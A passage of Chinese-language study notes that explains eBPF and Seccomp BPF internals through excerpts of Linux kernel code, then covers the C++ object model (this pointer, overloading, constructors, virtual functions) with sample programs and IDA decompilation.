BPF_MAP_TYPE_PERCPU_ARRAY,
BPF_MAP_TYPE_STACK_TRACE,
BPF_MAP_TYPE_CGROUP_ARRAY,
BPF_MAP_TYPE_LRU_HASH,
BPF_MAP_TYPE_LRU_PERCPU_HASH,
BPF_MAP_TYPE_LPM_TRIE,
BPF_MAP_TYPE_ARRAY_OF_MAPS,
BPF_MAP_TYPE_HASH_OF_MAPS,
BPF_MAP_TYPE_DEVMAP,
BPF_MAP_TYPE_SOCKMAP,
BPF_MAP_TYPE_CPUMAP,
BPF_MAP_TYPE_XSKMAP,
BPF_MAP_TYPE_SOCKHASH,
BPF_MAP_TYPE_CGROUP_STORAGE,
BPF_MAP_TYPE_REUSEPORT_SOCKARRAY,
BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE,
BPF_MAP_TYPE_QUEUE,
BPF_MAP_TYPE_STACK, /* 以栈形式存储数据 */
BPF_MAP_TYPE_SK_STORAGE,
BPF_MAP_TYPE_DEVMAP_HASH,
BPF_MAP_TYPE_STRUCT_OPS,
BPF_MAP_TYPE_RINGBUF,
BPF_MAP_TYPE_INODE_STORAGE,
BPF_MAP_TYPE_TASK_STORAGE,
};

Seccomp BPF

柏克莱封包过滤器(Berkeley Packet Filter,缩写 BPF),是类 Unix 系统上数据链路层的一种原始接口,提供原始链路层封包的收发,除此之外,如果网卡驱动支持洪泛模式,那么它可以让网卡处于此种模式,这样可以收到网络上的所有包,不管他们的目的地是不是所在主机

Seccomp BPF 是一种基于 Linux 内核的 BPF 过滤器,用于对 Linux 进程的系统调用进行过滤和拦截(eBPF 的一部分)

BPF 的指令集比较简单,开发人员定义了符号常量和两个方便的宏 BPF_STMTBPF_JUMP 可以用来方便的编写 BPF 规则

1
BPF_STMT(BPF_LD | BPF_W | BPF_ABS,(offsetof(struct seccomp_data, arch)))
  • BPF_LD:建一个 BPF 加载操作
  • BPF_W:操作数大小是一个字
  • BPF_ABS:使用绝对偏移,即使用指令中的值作为数据区的偏移量,该值是体系结构字段与数据区域的偏移量
  • offsetof():生成数据区域中期望字段的偏移量
1
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K ,AUDIT_ARCH_X86_64 , 1, 0)
  • BPF_JMP | BPF JEQ 会创建一个相等跳转指令,它将指令中的值(即第二个参数)与累加器中的值(BPF_K)进行比较,判断是否相等
    • 如果架构是则跳过下一条指令(jt=1,代表测试为真,跳过一条指令)
    • 否则将执行下一条指令(jf=0,代表测试为假,继续执行下一条指令)

用户编写的 eBPF 程序最终会被编译成 eBPF 字节码,eBPF 字节码使用 bpf_insn 结构来表示,如下:

1
2
3
4
5
6
7
struct bpf_insn {
__u8 code; /* 操作码 */
__u8 dst_reg:4; /* 目标寄存器 */
__u8 src_reg:4; /* 源寄存器 */
__s16 off; /* 偏移量 */
__s32 imm; /* 立即操作数 */
};

eBPF 程序会被 LLVM/Clang 编译成 bpf_insn 结构数组,这里使用了 JIT 即时编译技术(PS:当 eBPF 字节码被加载到内核时,内核会根据是否开启了 JIT 功能选项,来决定是否将 eBPF 字节码编译成机器码)

内核通过 bpf_prog_load 函数来加载 eBPF 字节码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog; /* 保存eBPF程序的信息 */
int err;
char license[128];
bool is_gpl;

......

/* plain bpf_prog allocation */
prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER); /* 初始化bpf_prog结构体 */
if (!prog)
return -ENOMEM;

......

/* run eBPF verifier */
err = bpf_check(&prog, attr, uattr);
if (err < 0)
goto free_used_maps;

prog = bpf_prog_select_runtime(prog, &err); /* 判断并使用jit进行编译 */
if (err < 0)
goto free_used_maps;

err = bpf_prog_alloc_id(prog);
if (err)
goto free_used_maps;

bpf_prog_kallsyms_add(prog);
perf_event_bpf_event(prog, PERF_BPF_EVENT_PROG_LOAD, 0);
bpf_audit_prog(prog, BPF_AUDIT_LOAD);

err = bpf_prog_new_fd(prog);
if (err < 0)
bpf_prog_put(prog);
return err;

free_used_maps:
/* In case we have subprogs, we need to wait for a grace
* period before we can tear down JIT memory since symbols
* are already exposed under kallsyms.
*/
__bpf_prog_put_noref(prog, prog->aux->func_cnt);
return err;
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_sec:
security_bpf_prog_free(prog->aux);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}
  • 函数 bpf_prog_load 会调用 bpf_prog_select_runtime 函数来判断是否使用 JIT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
struct bpf_prog *bpf_prog_select_runtime(struct bpf_prog *fp, int *err)
{
if (fp->bpf_func)
goto finalize;

bpf_prog_select_func(fp);

if (!bpf_prog_is_dev_bound(fp->aux)) {
*err = bpf_prog_alloc_jited_linfo(fp);
if (*err)
return fp;

fp = bpf_int_jit_compile(fp); /* 判断是否需要将eBPF字节码编译成机器码 */
if (!fp->jited) {
bpf_prog_free_jited_linfo(fp);
#ifdef CONFIG_BPF_JIT_ALWAYS_ON
*err = -ENOTSUPP;
return fp;
#endif
} else {
bpf_prog_free_unused_jited_linfo(fp);
}
} else {
*err = bpf_prog_offload_compile(fp);
if (*err)
return fp;
}

finalize:
bpf_prog_lock_ro(fp);

*err = bpf_check_tail_call(fp);

return fp;
}
EXPORT_SYMBOL_GPL(bpf_prog_select_runtime);
  • 对于不同的架构,函数 bpf_int_jit_compile 有不同的实现
  • 这里我们只分析 x86_64 架构下的 bpf_int_jit_compile
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
struct bpf_prog *bpf_int_jit_compile(struct bpf_prog *prog)
{
struct bpf_binary_header *header = NULL;
struct bpf_prog *tmp, *orig_prog = prog;
struct x64_jit_data *jit_data;
int proglen, oldproglen = 0;
struct jit_context ctx = {};
bool tmp_blinded = false;
bool extra_pass = false;
u8 *image = NULL;
int *addrs;
int pass;
int i;

if (!prog->jit_requested) /* 判断是否支持jit */
return orig_prog;

tmp = bpf_jit_blind_constants(prog);
/*
* If blinding was requested and we failed during blinding,
* we must fall back to the interpreter.
*/
if (IS_ERR(tmp))
return orig_prog;
if (tmp != prog) {
tmp_blinded = true;
prog = tmp;
}

jit_data = prog->aux->jit_data;
if (!jit_data) {
jit_data = kzalloc(sizeof(*jit_data), GFP_KERNEL);
if (!jit_data) {
prog = orig_prog;
goto out;
}
prog->aux->jit_data = jit_data;
}
addrs = jit_data->addrs;
if (addrs) {
ctx = jit_data->ctx;
oldproglen = jit_data->proglen;
image = jit_data->image;
header = jit_data->header;
extra_pass = true;
goto skip_init_addrs;
}
addrs = kmalloc_array(prog->len + 1, sizeof(*addrs), GFP_KERNEL);
if (!addrs) {
prog = orig_prog;
goto out_addrs;
}

/*
* Before first pass, make a rough estimation of addrs[]
* each BPF instruction is translated to less than 64 bytes
*/
for (proglen = 0, i = 0; i <= prog->len; i++) {
proglen += 64;
addrs[i] = proglen;
}
ctx.cleanup_addr = proglen;
skip_init_addrs:

/*
* JITed image shrinks with every pass and the loop iterates
* until the image stops shrinking. Very large BPF programs
* may converge on the last pass. In such case do one more
* pass to emit the final image.
*/
for (pass = 0; pass < 20 || image; pass++) {
proglen = do_jit(prog, addrs, image, oldproglen, &ctx); /* 将eBPF字节码编译成本地机器码 */
if (proglen <= 0) {
out_image:
image = NULL;
if (header)
bpf_jit_binary_free(header);
prog = orig_prog;
goto out_addrs;
}
if (image) {
if (proglen != oldproglen) {
pr_err("bpf_jit: proglen=%d != oldproglen=%d\n",
proglen, oldproglen);
goto out_image;
}
break;
}
if (proglen == oldproglen) {
u32 align = __alignof__(struct exception_table_entry);
u32 extable_size = prog->aux->num_exentries *
sizeof(struct exception_table_entry);

/* allocate module memory for x86 insns and extable */
header = bpf_jit_binary_alloc(roundup(proglen, align) + extable_size,
&image, align, jit_fill_hole);
if (!header) {
prog = orig_prog;
goto out_addrs;
}
prog->aux->extable = (void *) image + roundup(proglen, align);
}
oldproglen = proglen;
cond_resched();
}

if (bpf_jit_enable > 1)
bpf_jit_dump(prog->len, proglen, pass + 1, image); /* 打印eBPF字节码编译后的机器码 */

if (image) {
if (!prog->is_func || extra_pass) {
bpf_tail_call_direct_fixup(prog);
bpf_jit_binary_lock_ro(header);
} else {
jit_data->addrs = addrs;
jit_data->ctx = ctx;
jit_data->proglen = proglen;
jit_data->image = image;
jit_data->header = header;
}
prog->bpf_func = (void *)image; /* 将eBPF执行函数设置成编译后的机器码 */
prog->jited = 1;
prog->jited_len = proglen;
} else {
prog = orig_prog;
}

if (!image || !prog->is_func || extra_pass) {
if (image)
bpf_prog_fill_jited_linfo(prog, addrs + 1);
out_addrs:
kfree(addrs);
kfree(jit_data);
prog->aux->jit_data = NULL;
}
out:
if (tmp_blinded)
bpf_jit_prog_release_other(prog, prog == orig_prog ?
tmp : orig_prog);
return prog;
}

当函数 do_jit 将 eBPF 码编译为字节码后,可以直接调用 prog->bpf_func 来执行字节码

当内核要执行 eBPF 字节码时,会调用原本位于 prog->bpf_func 的函数 __bpf_prog_run,该函数是 BPF 的核心函数入口,该函数被多个不同 stack size 的函数调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn, u64 *stack)
{
#define BPF_INSN_2_LBL(x, y) [BPF_##x | BPF_##y] = &&x##_##y
#define BPF_INSN_3_LBL(x, y, z) [BPF_##x | BPF_##y | BPF_##z] = &&x##_##y##_##z
static const void * const jumptable[256] __annotate_jump_table = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */
BPF_INSN_MAP(BPF_INSN_2_LBL, BPF_INSN_3_LBL),
/* Non-UAPI available opcodes. */
[BPF_JMP | BPF_CALL_ARGS] = &&JMP_CALL_ARGS,
[BPF_JMP | BPF_TAIL_CALL] = &&JMP_TAIL_CALL,
[BPF_LDX | BPF_PROBE_MEM | BPF_B] = &&LDX_PROBE_MEM_B,
[BPF_LDX | BPF_PROBE_MEM | BPF_H] = &&LDX_PROBE_MEM_H,
[BPF_LDX | BPF_PROBE_MEM | BPF_W] = &&LDX_PROBE_MEM_W,
[BPF_LDX | BPF_PROBE_MEM | BPF_DW] = &&LDX_PROBE_MEM_DW,
}; /* 维护了一个跳表,根据opcode来进行跳转 */
#undef BPF_INSN_3_LBL
#undef BPF_INSN_2_LBL
u32 tail_call_cnt = 0;

#define CONT ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

select_insn:
goto *jumptable[insn->code];

/* ALU */
#define ALU(OPCODE, OP) \
ALU64_##OPCODE##_X: \
DST = DST OP SRC; \
CONT; \
ALU_##OPCODE##_X: \
DST = (u32) DST OP (u32) SRC; \
CONT; \
ALU64_##OPCODE##_K: \
DST = DST OP IMM; \
CONT; \
ALU_##OPCODE##_K: \
DST = (u32) DST OP (u32) IMM; \
CONT;

ALU(ADD, +)
ALU(SUB, -)
ALU(AND, &)
ALU(OR, |)
ALU(LSH, <<)
ALU(RSH, >>)
ALU(XOR, ^)
ALU(MUL, *)
#undef ALU
ALU_NEG:
DST = (u32) -DST;
CONT;
ALU64_NEG:
DST = -DST;
CONT;
ALU_MOV_X:
DST = (u32) SRC;
CONT;
ALU_MOV_K:
DST = (u32) IMM;
CONT;
ALU64_MOV_X:
DST = SRC;
CONT;
ALU64_MOV_K:
DST = IMM;
CONT;
LD_IMM_DW:
DST = (u64) (u32) insn[0].imm | ((u64) (u32) insn[1].imm) << 32;
insn++;
CONT;
ALU_ARSH_X:
DST = (u64) (u32) (((s32) DST) >> SRC);
CONT;
ALU_ARSH_K:
DST = (u64) (u32) (((s32) DST) >> IMM);
CONT;
ALU64_ARSH_X:
(*(s64 *) &DST) >>= SRC;
CONT;
ALU64_ARSH_K:
(*(s64 *) &DST) >>= IMM;
CONT;
ALU64_MOD_X:
div64_u64_rem(DST, SRC, &AX);
DST = AX;
CONT;
ALU_MOD_X:
AX = (u32) DST;
DST = do_div(AX, (u32) SRC);
CONT;
ALU64_MOD_K:
div64_u64_rem(DST, IMM, &AX);
DST = AX;
CONT;
ALU_MOD_K:
AX = (u32) DST;
DST = do_div(AX, (u32) IMM);
CONT;
ALU64_DIV_X:
DST = div64_u64(DST, SRC);
CONT;
ALU_DIV_X:
AX = (u32) DST;
do_div(AX, (u32) SRC);
DST = (u32) AX;
CONT;
ALU64_DIV_K:
DST = div64_u64(DST, IMM);
CONT;
ALU_DIV_K:
AX = (u32) DST;
do_div(AX, (u32) IMM);
DST = (u32) AX;
CONT;
ALU_END_TO_BE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_be16(DST);
break;
case 32:
DST = (__force u32) cpu_to_be32(DST);
break;
case 64:
DST = (__force u64) cpu_to_be64(DST);
break;
}
CONT;
ALU_END_TO_LE:
switch (IMM) {
case 16:
DST = (__force u16) cpu_to_le16(DST);
break;
case 32:
DST = (__force u32) cpu_to_le32(DST);
break;
case 64:
DST = (__force u64) cpu_to_le64(DST);
break;
}
CONT;

/* CALL */
JMP_CALL:
/* Function call scratches BPF_R1-BPF_R5 registers,
* preserves BPF_R6-BPF_R9, and stores return value
* into BPF_R0.
*/
BPF_R0 = (__bpf_call_base + insn->imm)(BPF_R1, BPF_R2, BPF_R3,
BPF_R4, BPF_R5);
CONT;

JMP_CALL_ARGS:
BPF_R0 = (__bpf_call_base_args + insn->imm)(BPF_R1, BPF_R2,
BPF_R3, BPF_R4,
BPF_R5,
insn + insn->off + 1);
CONT;

JMP_TAIL_CALL: {
struct bpf_map *map = (struct bpf_map *) (unsigned long) BPF_R2;
struct bpf_array *array = container_of(map, struct bpf_array, map);
struct bpf_prog *prog;
u32 index = BPF_R3;

if (unlikely(index >= array->map.max_entries))
goto out;
if (unlikely(tail_call_cnt > MAX_TAIL_CALL_CNT))
goto out;

tail_call_cnt++;

prog = READ_ONCE(array->ptrs[index]);
if (!prog)
goto out;

/* ARG1 at this point is guaranteed to point to CTX from
* the verifier side due to the fact that the tail call is
* handled like a helper, that is, bpf_tail_call_proto,
* where arg1_type is ARG_PTR_TO_CTX.
*/
insn = prog->insnsi;
goto select_insn;
out:
CONT;
}
JMP_JA:
insn += insn->off;
CONT;
JMP_EXIT:
return BPF_R0;
/* JMP */
#define COND_JMP(SIGN, OPCODE, CMP_OP) \
JMP_##OPCODE##_X: \
if ((SIGN##64) DST CMP_OP (SIGN##64) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_X: \
if ((SIGN##32) DST CMP_OP (SIGN##32) SRC) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP_##OPCODE##_K: \
if ((SIGN##64) DST CMP_OP (SIGN##64) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT; \
JMP32_##OPCODE##_K: \
if ((SIGN##32) DST CMP_OP (SIGN##32) IMM) { \
insn += insn->off; \
CONT_JMP; \
} \
CONT;
COND_JMP(u, JEQ, ==)
COND_JMP(u, JNE, !=)
COND_JMP(u, JGT, >)
COND_JMP(u, JLT, <)
COND_JMP(u, JGE, >=)
COND_JMP(u, JLE, <=)
COND_JMP(u, JSET, &)
COND_JMP(s, JSGT, >)
COND_JMP(s, JSLT, <)
COND_JMP(s, JSGE, >=)
COND_JMP(s, JSLE, <=)
#undef COND_JMP
/* STX and ST and LDX*/
#define LDST(SIZEOP, SIZE) \
STX_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = SRC; \
CONT; \
ST_MEM_##SIZEOP: \
*(SIZE *)(unsigned long) (DST + insn->off) = IMM; \
CONT; \
LDX_MEM_##SIZEOP: \
DST = *(SIZE *)(unsigned long) (SRC + insn->off); \
CONT;

LDST(B, u8)
LDST(H, u16)
LDST(W, u32)
LDST(DW, u64)
#undef LDST
#define LDX_PROBE(SIZEOP, SIZE) \
LDX_PROBE_MEM_##SIZEOP: \
bpf_probe_read_kernel(&DST, SIZE, (const void *)(long) (SRC + insn->off)); \
CONT;
LDX_PROBE(B, 1)
LDX_PROBE(H, 2)
LDX_PROBE(W, 4)
LDX_PROBE(DW, 8)
#undef LDX_PROBE

STX_XADD_W: /* lock xadd *(u32 *)(dst_reg + off16) += src_reg */
atomic_add((u32) SRC, (atomic_t *)(unsigned long)
(DST + insn->off));
CONT;
STX_XADD_DW: /* lock xadd *(u64 *)(dst_reg + off16) += src_reg */
atomic64_add((u64) SRC, (atomic64_t *)(unsigned long)
(DST + insn->off));
CONT;

default_label:
/* If we ever reach this, we have a bug somewhere. Die hard here
* instead of just returning 0; we could be somewhere in a subprog,
* so execution could continue otherwise which we do /not/ want.
*
* Note, verifier whitelists all opcodes in bpf_opcode_in_insntable().
*/
pr_warn("BPF interpreter: unknown opcode %02x\n", insn->code);
BUG_ON(1);
return 0;
}

cpp 对象

C++ 的每一个成员函数在 class 中声明,但是却不出现在每个对象中:

  • 每一个非内联的成员函数,只会诞生一个函数实例
  • 每个内联函数,会在其每一个使用者身上产生一个函数实例

C++ 的类就相当于一个数据结构体加上多个函数:

1
Class = data structure + code (methods)

This 指针

This 指针就是指向实例对象自己的指针

案例一:This 的使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#include<iostream>
#include<string.h>
using namespace std;

class Base{
public:
void fun(){
cout<<name<<endl;
}
char name[8];
};

class A : public Base{
public:
void foo(){
strcpy(this->name,"A");
this->fun(); // 相当于fun
}
};

class B : public Base{
public:
void foo(){
strcpy(this->name,"B");
this->fun();
}
};

int main(void){
A *a = new A();
B *b = new B();
a->foo();
b->foo();
}
  • 在调用类函数时,会将其 new 出来的堆内存当做第一个参数传入(相当于传入了该对象的数据结构体)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rax
B *v4; // rax
A *a; // [rsp+0h] [rbp-10h]
B *b; // [rsp+8h] [rbp-8h]

v3 = (A *)operator new(8uLL);
*v3 = 0LL;
a = v3;
v4 = (B *)operator new(8uLL);
*v4 = 0LL;
b = v4;
A::foo(a);
B::foo(b);
return 0;
}
  • 使用 This 指针,可以快速操控本实例对象的各个成员:
1
2
3
4
5
void __cdecl A::foo(A *const this)
{
*(_WORD *)this->name = 65; // 编译器优化了
Base::fun(this);
}

重载

C++ 允许在同一作用域中的某个函数和运算符指定多个定义,分别称为:

  • 函数重载
  • 运算符重载

函数重载:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <iostream>
using namespace std;

class Test{
public:
void print(int i) {
cout<<"int:"<<i<<endl;
}
void print(double f) {
cout<<"double:"<<f<<endl;
}
};

int main(void)
{
Test *t = new Test;
t->print(1);
t->print(1.1);
}
  • 对于类函数来说,编译器会把 [类名称,函数名称,参数列表] 放入哈希函数转化为一个哈希值,并用这个哈希值来当做函数的名称:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near

f= qword ptr -18h
t= qword ptr -8

; __unwind {
push rbp
mov rbp, rsp
sub rsp, 20h
mov edi, 1 ; unsigned __int64
call __Znwm ; operator new(ulong)
mov [rbp+t], rax
mov rax, [rbp+t]
mov esi, 1 ; i
mov rdi, rax ; this
call _ZN4Test5printEi ; Test::print(int)
mov rdx, cs:qword_2018
mov rax, [rbp+t]
mov [rbp+f], rdx
movsd xmm0, [rbp+f] ; f
mov rdi, rax ; this
call _ZN4Test5printEd ; Test::print(double)
mov eax, 0
leave
retn
; } // starts at 11BA
main endp
  • 在汇编代码中,程序调用的函数已经确定
  • 那么编译器可能是在语法分析时,就通过参数列表确定了应该调用的函数

运算符重载(内部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#include <iostream>
using namespace std;

class Box
{
public:
double getVolume(void){
return length * breadth * height;
}
void setAll(double len,double bre,double hei){
length = len;
breadth = bre;
height = hei;
}
Box operator + (const Box& b){ /* 重载运算符'+'(只有'+'两边都是Box类型时,才会触发该函数) */
Box box;
box.length = this->length + b.length;
box.breadth = this->breadth + b.breadth;
box.height = this->height + b.height;
return box;
}
double length;
double breadth;
double height;
};

int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume();
volume = Box2.getVolume();
Box3 = Box1 + Box2;
volume = Box3.getVolume();

return 0;
}
  • 在一个类中重载运算符过后,其作用范围为整个文件,以及引入该类的其他文件
  • 本质上重载运算符就是调用对应的函数(其参数和返回值必须符合条件)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
Box::operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl Box::operator+(Box *retstr, Box *const this, const Box *b)
{
retstr->length = b->length + this->length;
retstr->breadth = b->breadth + this->breadth;
retstr->height = b->height + this->height;
return retstr;
}
  • PS:Cpp 库中也有许多运算符重载的案例:new<<>>

运算符重载(外部):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
using namespace std;

class Box
{
public:
double getVolume(void){
return length * breadth * height;
}
void setAll(double len,double bre,double hei){
length = len;
breadth = bre;
height = hei;
}
double length;
double breadth;
double height;
};

Box operator + (const Box& a,const Box& b){
Box box;
box.length = a.length + b.length;
box.breadth = a.breadth + b.breadth;
box.height = a.height + b.height;
return box;
}

int main(){
Box Box1;
Box Box2;
Box Box3;
double volume = 0.0;

Box1.setAll(1.0,1.0,1.0);
Box2.setAll(2.0,2.0,2.0);

volume = Box1.getVolume();
volume = Box2.getVolume();
Box3 = Box1 + Box2;
volume = Box3.getVolume();

return 0;
}
  • 在全局重载运算符过后,其作用范围就是全局(但可以被命名空间限制)
1
2
3
4
5
6
7
Box::setAll(&Box1, 1.0, 1.0, 1.0);
Box::setAll(&Box2, 2.0, 2.0, 2.0);
Box::getVolume(&Box1);
volume = Box::getVolume(&Box2);
operator+(&v4, &Box1, &Box2);
Box3 = v4;
Box::getVolume(&Box3);
1
2
3
4
5
6
7
Box *__cdecl operator+(Box *retstr, const Box *a, const Box *b)
{
retstr->length = b->length + a->length;
retstr->breadth = b->breadth + a->breadth;
retstr->height = b->height + a->height;
return retstr;
}

内联函数

在类的声明内部声明和定义的函数叫做内联成员函数

  • 内联函数类似于宏函数,但内联函数是在编译时展开,而宏在预编译时展开
  • 内联函数的定义和使用必须在同一文件,因此最好将内联函数定义放在头文件中

定义在类中的成员函数默认都是内联的,类外定义则要加上 inline(类的成员函数是指那些把定义和原型写在类定义内部的函数)

1
2
3
4
5
6
7
class Test{
public:
void setA(int _a); // 普通函数
void setB(int _b){b = _b;} // 隐式的内联函数
inline void setC(int _c); // 显式的内联函数
int a,b,c;
};
  • 在 IDA 中分析或者在 GDB 中调试,都发现函数没有内联成功(还是当成普通文件来调用),可能是编译器的原因

构造函数

以下几种情况下,会合成有用的构造函数:

  • 带有默认构造函数的成员对象(例如:string 类)
  • 一个派生类的父类带有构造函数(或者父类的成员对象带有默认构造函数),那么子类:
    • 如果没有定义构造函数,则会合成默认构造函数
    • 如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数
  • 带有一个虚函数的类
    • 类声明(或继承)一个虚函数
    • 类派生自一个继承串链,其中有一个或更多的虚基类

案例一:带有默认构造函数的成员对象

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <iostream>  
#include <string>

using namespace std;

class Test
{
public:
string name;
};

int main(int argc, char* argv[])
{
Test t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test t; // [rsp+10h] [rbp-40h] BYREF
unsigned __int64 v5; // [rsp+38h] [rbp-18h]

v5 = __readfsqword(0x28u);
Test::Test(&t);
Test::~Test(&t);
return 0;
}
  • 由于 Test 类中的 string 类带有默认构造函数,因此 Test 类会合成一个构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
std::string::basic_string(this);
}

案例二:没有定义构造函数,则会合成默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>  
#include <string>

using namespace std;

class Test1{
public:
Test1();
};

class Test2 : public Test1{

};

Test1::Test1(void){
cout << "Test1" << endl;
}

int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于 Test2 没有构造函数,但父类 Test1 有构造函数,因此在 Test2 的构造函数中会调用 Test1 的构造函数:
1
2
3
4
void __cdecl Test2::Test2(Test2 *const this)
{
Test1::Test1(this);
}

案例三:如果有构造函数,但是没有调用父类的构造函数,则编译器会插入一些代码调用父类的默认构造函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>  
#include <string>

using namespace std;

class Test1{
public:
Test1();
};

class Test2 : public Test1{
public:
Test2();
};

Test1::Test1(void){
cout << "Test1" << endl;
}

Test2::Test2(void){
cout << "Test2" << endl;
}

int main(int argc, char* argv[]){
Test2 t;
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test2 t; // [rsp+17h] [rbp-9h] BYREF
unsigned __int64 v5; // [rsp+18h] [rbp-8h]

v5 = __readfsqword(0x28u);
Test2::Test2(&t);
return 0;
}
  • 由于在 Test2 的构造函数中没有调用父类 Test1 的构造函数,因此编译器会自动加上 Test2 的构造函数:
1
2
3
4
5
6
7
8
void __cdecl Test2::Test2(Test2 *const this)
{
__int64 v1; // rax

Test1::Test1(this);
v1 = std::operator<<<std::char_traits<char>>(&std::cout, "Test2");
std::ostream::operator<<(v1, &std::endl<char,std::char_traits<char>>);
}

案例四:带有一个虚函数的类

  • 源代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#include<iostream>
using namespace std;

class Test{
public:
virtual void foo(){
cout<<"Test::foo() is called"<<endl;
}
};

int main(void){
Test *t = new Test();
t->foo();
return 0;
}
  • IDA 分析:
1
2
3
4
5
6
7
8
9
10
int __cdecl main(int argc, const char **argv, const char **envp)
{
Test *v3; // rbx

v3 = (Test *)operator new(8uLL);
v3->_vptr_Test = 0LL;
Test::Test(v3);
(*v3->_vptr_Test)(v3, argv);
return 0;
}
  • 由于 Test 中有虚函数,因此编译器会自动为其生成构造函数:
1
2
3
4
void __cdecl Test::Test(Test *const this)
{
this->_vptr_Test = (int (**)(...))&off_3D70;
}

虚函数

面向对象的语言有三大特性:继承、封装、多态,虚函数就是 cpp 实现多态的方式

  • 多态:指用相同的接口去表示不同的实现

案例一:使用虚函数实现多态

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include<iostream>
using namespace std;

class Base{
public:
virtual void foo(){
cout<<"Base::foo() is called"<<endl;
}
};

class A:public Base{
public:
void foo(){
cout<<"A::foo() is called"<<endl;
}
};

class B:public Base{
public:
void foo(){
cout<<"B::foo() is called"<<endl;
}
};

class C:public Base{
public:
void foo(){
cout<<"C::foo() is called"<<endl;
}
};

int main(void){
